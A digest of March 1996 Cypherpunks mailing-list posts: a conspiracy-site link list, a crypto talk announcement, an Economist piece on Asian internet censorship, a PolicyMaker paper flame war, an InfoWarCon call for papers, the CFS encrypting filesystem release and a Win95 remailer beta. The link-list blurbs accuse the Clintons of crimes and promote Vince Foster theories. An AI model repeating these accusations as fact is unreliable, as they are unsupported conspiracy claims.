Subject: Web Page Links
Message-ID: <960316173225_102774.1273_GHU80-3@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


CYPHERPUNKS:

What is your main home page address?  I found you at
http://ibd.ar.com/lists/comp/cypherpunks/199508081922.MAA20209@netcom5.netcom.com
.html

We would like to speak to you about providing a link to your web page from
our Media Distribution web page and possibly a link back to our web page as
well.  The products we are currently promoting cover topics found on your web
page.  We are trying to get information to the public as fast as possible which
I think is a common goal you have as well.

Please visit our web page at http://www.ibb.com/media.html

We are going to leave this page as a text only page and will be adding another
web page (on another server) in 30 days with frames, video clips, audio clips,
images and in multiple languages.

We can be reached at INTERNET:102774.1273@compuserve.com
or at media@injersey.com

The following is our current list of hot links we are adding to our page:


Clinton Expose Web by David Sussman
http://www.4bypass.com/4by_expose.html (this address may change)

Jeremiah Films Educational and Religious Market Videos, Television Programs and
Books
http://www.empirenet.com/~jeremiah/

Media Bypass - "The Uncensored National News"
http://www.4bypass.com

Conspiracy Nation - John Lawrence Fishers "Corruption in America" page
dedicated to exposing corruption in America wherever it may be found.
http://www.europa.com/~johnlf

Zenger News Service R - maintains a global database of business and civic
entities and key personalities which support individual liberty and other
traditional American values.  ZNS distributes topical background news and
investigative reports electronically and by mail, and publishes a monthly
leadership-oriented newsletter, "Principia" .
http://www.zns.com

The Death Of Vince Foster web page is a compilation of the work of Christopher
Ruddy, a journalist whose work appears in the Pittsburgh Tribune-Review. The
site contains roughly 50 articles dealing with Foster, Whitewater and the
Clinton White House which are maintained by Adam Music, Online Editor.
http://tribune-review.com/trib/ruddy/

War Room America's only FM, rock 'n roll, kick ass, conservative, morning
show; where liberal music collides head on with conservatism and looses!
It's "Truth" at the speed of light! Jim Quinn Live On The Internet [Real Audio]
http://www.warroom.com/sound_archive/real_audio/real_audio.html

Drudge Report from Hollywood, California USA by Matt Drudge
http://www.lainet.com/~drudge

Accuracy in Media http://take.aim.org/aim.html Accuracy in Academia
http://take.aim.org 

BeachBum's Page More than you wanted to know about the scandals of the First
Felons,
Bill and Hilllary Clinton, especially as relates to the death of Vince Foster.
It'll keep you awake at night!
http://users.aol.com/beachbt/index.html

The Other Side Conservative opinion on the net by author Mark E. Howerter
http://www.cris.com/~dhathaw/otherside/

The Rancho Runnamukka This webpage for PIXELODEON, owned by Michael & Claire
Rivero, covers not only their work in music and film, but their interests in
archaeology and politics as well.
http://www.accessone.com/~rivero

Dave Feustel's Web Page This web page deals with the question "Just How Corrupt
IS our federal Government?".
http://www.mixi.net/~feustel/

Extremist Home Page Do YOU qualify as an Extremist?  The Politically Correct,
modern definition is a person who exhibits one or more of the following
qualities: *Has an explicit philosophical base.  *Has a concise, inflexible
moral code.  *Has an ethical standard which is not relative or situational.
*Believes in a Creator God.  *Believes that life, liberty and property are
sacred.  *Is willing to stand up for these principles and beliefs.  -  The
purpose of this page is to provide some pointers to extremists who want to
gather their own information, directly from the sources, rather than accept some
non-extremist's interpretation of reality. The battle for the mind and spirit of
We the People rages on. The weapons that we face are Propaganda, Misinformation,
Rhetoric and Censorship.  Protect yourself. Ask questions. Question answers. Do
your own homework and come to your own conclusions. Then, act on those
conclusions! By Pete Celano.
http://WWW.Alliance.Net/~celano19/

Free Speech Newspaper A current collection by top writers and researchers of
exposes on government, corporate and institutional coverup and fraud. Exposing
serious media abuses. Free Speech Forum (HyperMail), A Web Site Newsgroup on
above topics.
http://www.FreeSpeechNews.com/callme/

Dwights World "Home of great Republicans" Americans for Conservative Action.
http://utiweb.com/~lincoln


LIN
MEDIA DISTRIBUTION





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Sun, 17 Mar 1996 03:44:05 +0800
To: 102774.1273@compuserve.com (Media Distribution)
Subject: Re: Web Page Links
In-Reply-To: <960316173225_102774.1273_GHU80-3@CompuServe.COM>
Message-ID: <199603161926.OAA06910@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> CYPHERPUNKS:
> 
> What is your main home page address?  I found you at
> http://ibd.ar.com/lists/comp/cypherpunks/199508081922.MAA20209@netcom5.netcom.com
> .html
> 
> We would like to speak to you about providing a link to your web page from
> our Media Distribution web page and possibly a link back to our web page as
> well.  The products we are currently promoting cover topics found on your web
> page.  We are trying to get information to the public as fast as possible which
> I think is a common goal you have as well.

[conspiracy theory drivel deleted]

Hee, this made me laugh a lot lot lot.

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com - (610) 859-0100
Systems Administrator / Webmaster, HYGNet       My words are my own; please
Rabbits on walls, no problem.                   don't blame my employer!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sat, 16 Mar 1996 22:09:21 +0800
To: lull@acm.org
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <199603161357.OAA11003@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


> At 12:18 AM 3/16/96 GMT, John Lull wrote:
> >On Thu, 14 Mar 1996 21:54:10 +0100, Gary Howland wrote:
> >
> >> NTSC (TV video) modulation is done by phase modulation of the 3.579545 MHz
> >> subcarrier.
> >
> >This is not correct.  I'd suggest you go back and re-read your NTSC
> > references.

Sorry, I didn't write that!  I accidentally replied to this mail, but
didn't comment on it - must be someone else!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Mar 1996 05:56:36 +0800
To: cypherpunks@toad.com
Subject: DCSB: Implementing Financial Cryptography, The Cybercash Experience
Message-ID: <v02120d02ad70e417a41a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                        Donald E. Eastlake, III

                  Implementing Financial Cryptography,
                       The Cybercash Experience


                        Tuesday, April 2, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Donald Eastlake is a Senior Systems Engineer with CyberCash, Inc., operators
of a credit card based secure Internet payment system. He specializes in
security and message protocol design and implementation and is also the
editor for the IETF Domain Name System Security Working Group.

This talk will cover the CyberCash credit card protocol and the lessons
learned in its implementation.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, April 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, March 30, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUszPvgyLN8bw6ZVAQHvAQP/XLySwqdqfNb33UjXc5GKOmXsRywGgM60
vlvmzjhHKyLyQhDtp1wgtJqlaTPd5Dkch/r4FU73cuPjrcbV5g3mOxFAmxebSrq3
O2iGN6TxXUrI+abvny0X+atl3htK2VHDZr+gHMfqX/NRU4mFEEuUyStF3zJQ1lyq
J9RYE9LUhJQ=
=zGoQ
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 17 Mar 1996 02:09:59 +0800
To: cypherpunks@toad.com
Subject: Yeo, Pea-brained Imbecile
Message-ID: <199603161748.SAA07515@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Economist, 16 March 1996, pp. 42-43.

Asia and the Internet: Not too modern, please

Hunched quietly over their terminals around the world, the
mouse-clicking, keyboard-tapping denizens of the Internet have
created quite a noise in Asia. The worldwide computer network
is still young in the region, but already cyberspace resounds
to the crashing of broken taboos, and collisions with the
powers that be.

In discussion groups on the Internet, you will find views
never aired in the domestic media; about Malaysia, a call for
the emigration of ethnic Chinese; about Indonesia, passionate
pleas for East Timorese independence; about Thailand, jibes at
the monarchy, which are a crime. On the World Wide Web, the
fast-growing multimedia part of the network, everyone from
Confucius to the Penthouse pet of the month seems to have a
"home page".

All of this confronts many Asian governments with an old
dilemma in a new form. All want to be "modern". But many
reject the notion that modernity encompasses the sort of
political pluralism seen in the west. On the Internet
modernity and pluralism go hand in hand. Hence the recent
flurry of efforts by governments in the region to exert
control over the Internet and overturn what they see as the
American colonisation of cyberspace.

The effort is complicated by the undoubted commercial
potential ofthe Internet, and its future as a business tool.
Most countries would prefer to do without the smut and the
anti-government invective, but none wants to risk being left
out. Fidel Ramos, president ofthe Philippines,whose press is
freer than others in Asia, has his own home page, but so does
the military junta that runs Myanmar's media like an Orwellian
Ministry of Truth.

The dilemma is most acute for Singapore. More than any other
country in the region, it prides itself on being ahead of the
technological game. Indeed, its economic success relies on a
state-of-the-art infrastructure. By the end of the century the
government hopes to have created an "intelligent island", with
at least 95% of homes cabled for services like the Internet
and interactive television.

Already, the government has a big presence on the World Wide
WebHt even provides links to a Board for Online Graffiti ("the
only place in Singapore where graffiti are legal"). You can
make your choice of virtual lavatory wall on which to scribble
a message. More seriously, the World Chinese Business Network
hopes to harness the Internet to the legendary "guanxi" or
connections that drive overseas Chinese business. George Yeo,
Singapore's information minister, is fluent in cyberbabble.
"we will need a URL [universal resource locator] that is easy
to remember," he told a meeting of his colleagues from the
Association of South-East Asian Nations (ASEAN) on March 7th.
"we should also encourage hyperlinks to each other's web
pages."

But Singapore is also among the staunchest critics of
unfettered individualism, and of western attempts to foist its
political standards on Asia. Because its content remains
dominated by westerners, the Internet can be seen as part of
such an attempt. Every fanatic liberal and foulmouthed crank
can air his heresies and obscenities. So Mr Yeo also warned
his ASEAN colleagues that "the influx of objectionable
materials via the new electronic media, if left unchecked,
will undermine our values and traditions."

He was speaking the day after Singapore had introduced
"anti-pollution measures" to clean up the I nternet in
Singapore. The three local "providers", offering access to the
I nternet by a domestic telephone call, will be required to
filter out offensive material. "Cybercafes" providing
computers for customers to use the Internet will have to
install filter software such as "Net Nanny" or "Surf Watch".
But this is not just an antipornography drive like that seen
in many countries. Organisations posting political or
religious information on to the World Wide Web will need to
register with the broadcasting authority.

Technically, Singapore's effort to control the Internet will
be complicated. Mr Yeo suggested it was feasible because all
international telephone traffic reaches Singapore through one
network, operated by Singapore Telecom. So the authorities are
able to monitor anything being sent to Internet servers (who
distribute material) in Singapore. Singaporeans could still
dial abroad and get access to the uncensored Net. But that
would be expensive -- prohibitively so for most people,
especially if they wanted to download a pin-up, which can be
frustratingly time-consuming.

Mr Yeo stressed that Singapore did not intend to "stifle
discussion". The only obligation on those engaging in
political debate was to take a "certain responsibility and
accountability" for their views. It was not clear how these
requirements would apply to the Singaporean who responded to
the speech by calling the minister a "pea-brained imbecile" on
an Internet discussion group.

Singapore's house-cleaning effort will be watched closely by
other governments in the region. Of Singapore's 3m people,
100,000 already have Internet accounts, twice as many as in
China (population 1.2 billion). Nevertheless, China has
already gone a step further than Singapore, requiring all
Internet users as well as providers to register. It too is
looking at how to put a cordon sanitaire around the Internet.
Like Myanmar and Vietnam, it is particularly concerned about
the campaigning activities in cyberspace of exiled dissidents.
Vietnam is seeking prevention rather than cure. The
state-owned Internet provider, Netnam, does not as yet give
subscribers access to the World Wide Web, just to e-mail
services.

Other ASEAN countries have so far preferred to be seen as
Internet-friendly. Malaysia's deputy prime minister, Anwar
Ibrahim, recently opened an exhibition about the Internet in
Kuala Lumpur with a warning against censorship. "Let us not
forget", he said, "that an informed citizenry is also a
responsible citizenry."

Similarly in Indonesia and Thailand, the Internet is largely
unregulated. An Indonesian magazine, Tempo, banned in 1994 for
upsetting the government, has just reappeared "on-line", which
even the censors admit is perfectly legal. In the much freer
intellectual climate of Thailand, the concern has been as much
about sex as about politics. An Internet campaign has urged a
boycott of Thai goods because of the prevalence of child
prostitution in the country. And a photograph has been posted
on the Internet purportedly showing a senior politician
engaged in sexual congress with another man's wife.

As the Internet gathers pace, so too will its impact on the
political scene. InJanuary an article in Singapore's
obsequiously pro-government Straits Times asked whether
Singapore would "change the Internet", or the other way round.
"A little of both," it concluded. But as the Internet
free-for-all becomes more readily available to the population
at large, other, more decorous, media may find it hard to
ignore the challenge. The Straits Times itself may be among
the first to feel the change.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Mar 1996 08:14:30 +0800
To: cypherpunks@toad.com
Subject: Re: PolicyMaker paper available
In-Reply-To: <199603161912.TAA08618@pangaea.hypereality.co.uk>
Message-ID: <199603162353.SAA15330@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
[Crap]
> I D/Led this file last night & printed it out. I was a little suspicious
> at first because you'd think if AT&T really wanted people to read (instead
> of just wanting to say they published it) they'd put it on the web in http
> and not use obscure printer codes.

Huh? Postscript an "obscure printer code"?

> Behind all the obscure printer codes and fancy language, it is obvious to
> anyone with half a brain that this is just a move by AT&T to put itself
> on top of the internet certificate hierarchy where your're locked in
> to using AT&T software and internet service (just like RSA and Netscape).
> You have to license AT&T code to use it and you need an AT&T approved
> policy attribute or something in order to make it work.

You are on drugs, whomever you are. Matt and company have done some
very interesting work here on certificate policies. The work is
unpatented and involves no proprietary AT&T technology. In short, you
are both an stupid and paranoid. You probably didn't understand what
you were reading.

If you had a milligram of self respect, you'd come out from behind
that anonymous remailer. Of course, I expect that you know that your
words are embarassing rather than something to be proud of.

The paper in question is seminal. I strongly urge people who don't
drool when they open their mouths to read it.

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Sun, 17 Mar 1996 03:37:53 +0800
To: cypherpunks@toad.com
Subject: Re: PolicyMaker paper available
Message-ID: <199603161912.TAA08618@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Mab@Research.Att.Com posted:
>A number of people have been asking me about some work I've been doing
>(with Joan Feigenbaum and Jack Lacy) on alternatives to traditional
>(X.509, PGP, etc.) identity-based certificates.  We've just finished
>up our paper on the concept, "Decentralized Trust Management", to
>appear at the Oakland Security Conference in May.
>
>A PostScript pre-print is available in
>     ftp://research.att.com/dist/mab/policymaker.ps

I D/Led this file last night & printed it out. I was a little suspicious
at first because you'd think if AT&T really wanted people to read (instead
of just wanting to say they published it) they'd put it on the web in http
and not use obscure printer codes. But after I read it my suspicious
nature was confirmed.

Behind all the obscure printer codes and fancy language, it is obvious to
anyone with half a brain that this is just a move by AT&T to put itself
on top of the internet certificate hierarchy where your're locked in
to using AT&T software and internet service (just like RSA and Netscape).
You have to license AT&T code to use it and you need an AT&T approved
policy attribute or something in order to make it work.

Ask yourself why they'd publish this otherwise. Hint: youre safer trusting
university research than corporate research-marketing.

PGP is good enuf for me.

>-matt
>
>[NB: I no longer read the cypherpunks list with any regularity, so
>please cc me directly on any comments or discussion.  Thanks.]

Uh huhhhhhh. Blaze and AT&T are no friends of the cypherpunks and no
longer even condesend to pretend as much.

Don't even ask me about their motives for supporting the Leahy
key escrow bill.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Mar 1996 00:57:06 +0800
To: abacard@well.sf.ca.us
Subject: Re: InfoWarCon V 1996: Call For Papers
Message-ID: <m0tyBuf-00090YC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 3/16/96 -0500, winn@Infowar.Com wrote:
>                   C A L L   F O R   P A P E R S 
>
>                          InfoWarCon 5, 1996
>           Fifth International Information Warfare Conference
>            "Dominating the Battlefields of Business and War"
>                         September 5-6, 1996
>                           Washington, DC
>Sponsored by:
>     Winn Schwartau, Interpact, Inc.
>     National Computer Security Association
>     Robert Steele, Open Source Solutions, Inc.
>
>Information Warfare represents a global challenge that faces all late-industrial 
>and information age nation states.  It also represents the easiest and cheapest 
>way for less developed nation-states and religious or political movements to 
>anonymously and grievously attack major nations and international corporations.
>
>This Fifth International Conference on Information Warfare is an unclassified, 
>open source conference, and will examine US and global perspectives on all three 
>classes of Information Warfare:

I'm wondering if I should bother re-writing my "Assassination Politics" 
essay into the form of a paper and submitting it to these people.  While it 
might nominally be considered right down their alley, from a subject 
standpoint, even a cursory look at the location (Washington, DC) and the 
invited people (large companies and military) suggest that my ideas would be 
just about as welcome as a yarmulke at a Nazi Party convention.

I'm not aware of the agenda (hidden or otherwise) of the sponsors, so I don't know whether I should even bother.  Many people aren't particularly appreciative of being "one-upped" (not to mention made obsolete) so it's not clear that they'd give me the time of day.  

Any ideas as to their receptiveness?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Sun, 17 Mar 1996 12:20:01 +0800
To: abacard@well.sf.ca.us
Subject: InfoWarCon V 1996: Call For Papers
Message-ID: <199603170401.XAA18462@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


               P L E A S E  D I S T R I B U T E  W I D E L Y

                   C A L L   F O R   P A P E R S 

                          InfoWarCon 5, 1996
           Fifth International Information Warfare Conference
            "Dominating the Battlefields of Business and War"
                         September 5-6, 1996
                           Washington, DC

Sponsored by:
     Winn Schwartau, Interpact, Inc.
     National Computer Security Association
     Robert Steele, Open Source Solutions, Inc.

Information Warfare represents a global challenge that faces all late-industrial 
and information age nation states.  It also represents the easiest and cheapest 
way for less developed nation-states and religious or political movements to 
anonymously and grievously attack major nations and international corporations.

This Fifth International Conference on Information Warfare is an unclassified, 
open source conference, and will examine US and global perspectives on all three 
classes of Information Warfare:

Class One: Personal Privacy: In Cyberspace You Are Guilty Until Proven Innocent
Class Two: Industrial and Economic Spying and Warfare
Class Three: Global Conflict, Terrorism and the Military

The three planned tracks will be:

     * Financial/Civilian Information Warfare (Class I and Class II)
     * Military and Terrorist Information Warfare (Class III)
     * Offensive and Defensive Technologies for Business and Government (Classes 
I, II and III)

We are seeking forward thinking papers, demonstrations and interactive concepts 
for presentation to an audience of 1000+, representing civilian and military 
from more than 20 countries, all branches of the US government and the top US 
corporations.

The papers should offer new perspectives, attitudes, studies, and technologies 
that can be used for the advancement of the field. You are free to submit on any 
subject matter, including, but not limited to:

     - Battlefield Dominance 
     - Industrial Espionage: cases, policies and defense.
     - Military perspectives on "Information in Warfare"
     - Policy Quagmires - Policy Resolutions
     - Personal Privacy in the global marketplace
     - Denial of Service techniques and technologies for the private sector and 
the military
     - Terrorism and Counter-terrorism
     - Defending Against the Internet: new techniques and methods
     - Threats to Global Electronic Commerce and Solutions
     - Anonymous International Banking
     - The convergence of the commercial and military in the Post Cold War World
     - InfoWar Technologies
     - Case Studies
     - Your Thoughts and Ideas

Please submit your 1-2 page concept white papers no later than May 5, 1996. The 
evaluation committee will let you know the results by May 15, at which point we 
will need your complete submission no later than July 15, 1996. Send you papers 
to: 
	Betty@Infowar.Com

For sponsorship opportunities and registration information at InfoWarCon V 1996, 
please contact:

National Computer Security Association
1.800.488.4595
pgates@ncsa.com or 
infowar96@ncsa.com


Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Mar 1996 17:29:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: InfoWarCon V 1996: Call For Papers
In-Reply-To: <m0tyBuf-00090YC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960317032827.11248A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Mar 1996, jim bell wrote:

> At 11:01 PM 3/16/96 -0500, winn@Infowar.Com wrote:
> >                   C A L L   F O R   P A P E R S 
> >
> >                          InfoWarCon 5, 1996
> >           Fifth International Information Warfare Conference
> >            "Dominating the Battlefields of Business and War"
> >                         September 5-6, 1996
> >                           Washington, DC
> 
> I'm wondering if I should bother re-writing my "Assassination Politics" 
> essay into the form of a paper and submitting it to these people.  While it 
> might nominally be considered right down their alley, from a subject 
> standpoint, even a cursory look at the location (Washington, DC) and the 
> invited people (large companies and military) suggest that my ideas would be 
> just about as welcome as a yarmulke at a Nazi Party convention.

It didn't take an analysis of the sponsor or even the forum to determine 
this.

> 
> I'm not aware of the agenda (hidden or otherwise) of the sponsors, so 
I don't know whether I should even bother.  Many people aren't 
particularly appreciative of being "one-upped" (not to mention made 
obsolete) so it's not clear that they'd give me the time of day. Any 
ideas as to their receptiveness?

I think you should keep your day job.  As to "one-upping" the key figures 
in the field.  Good luck.

Hey, you asked.

> Jim Bell
> jimbell@pacifier.com
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 17 Mar 1996 17:51:20 +0800
To: cypherpunks@toad.com
Subject: new release (v.1.3.3) of CFS encrypting filesystem
Message-ID: <199603170931.EAA02014@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version (release 1.3.3) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.  This version works under most BSD-derived Unix
systems and should now run without modification under most current Linux
releases as well.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An impoved key management scheme now allows chaning the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES, MacGuffin, and SAFER-SK128 encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 17 Mar 1996 20:41:00 +0800
To: cypherpunks@toad.com
Subject: Win95 Remailer beta
Message-ID: <2.2.32.19960317002833.00678054@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've finally managed to get my hack at a Win95-based remailer done. I've settled on RemailerBot for a name, an this will be version .9b(eta). It isn't pretty, and there isn't a whole lot of functionality to it yet (remailing, reorder, automagically kills subject lines, handles both anon-to and request-remailing-to). But at least it's *something*; I'll start adding to it ASAP. I'll have the (_heavily_ commented)  source (written in VB4 Pro, heh) available on my web page in a day or two (probably need to figure on Monday :-). Anyone wants it before then, email me and I'll zip it up and email it to you (state your preference for MIME or uuencoding).

Many thanks to the kind folks who sent 'anonymous mail' to me via my webmaster identity so that I'd have some 'real' remailer messages to play with.

Brief description of it is that it reads what Seattle Labs software (purveyors of SLMail95) assures me is a 'standard unix' .mbx file, separates it into component messages, processes them, and dumps the results into an outbox directory. It deletes (not wipes [yet]) any intermediate files. Wiping isn't a big priority (I think) because of Win95's System Agent which can run a defrag utility periodically.

My feature priorities are PGP first, followed by latency, then the rest. If there's anyone out there that can read VB source _and_ knows what a .mbx file really looks like, I'd appreciate having a cross-check on my parsing. Right now, it's SLMail-specific, and I'd like to be able to make sure it can handle a little more variety.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUtALsVrTvyYOzAZAQF9+gP+NBtz30BYmPhFBo2P6hPp5yD7nc2bP4ot
5J+HN8K6no3ESguAw2vyhjgY64xIFpD3OUsQsSyz67d7p2nuplKPdTCAKsywE3TF
xRcAnb62HH2XOb3QrlnVP17xUqyp8QNlu+fX4WWYqMCoxiyc0KEaFaC+7R7apAuA
KfPD7voioDI=
=lhjn
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Mon, 18 Mar 1996 07:25:45 +0800
To: cypherpunks@toad.com
Subject: M$ CryptoAPI Question
Message-ID: <314bb878.2839245@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

With the current releases of the NT 4.0 betas, I would assume some of
you have had the chance to look at the API more closely.  I am getting
ready to hack my first crypto enabled app and wondered if this was
worth using or if Crypto C++ is the way to go. 

I would think that if their implementation is solid, and some of the
*real* crypto gods write stronger CSP's than the M$ RSA Base CSP, this
would be a good approach to get more enabled apps accepted for regular
usage.

Any thoughts?

- --Bob

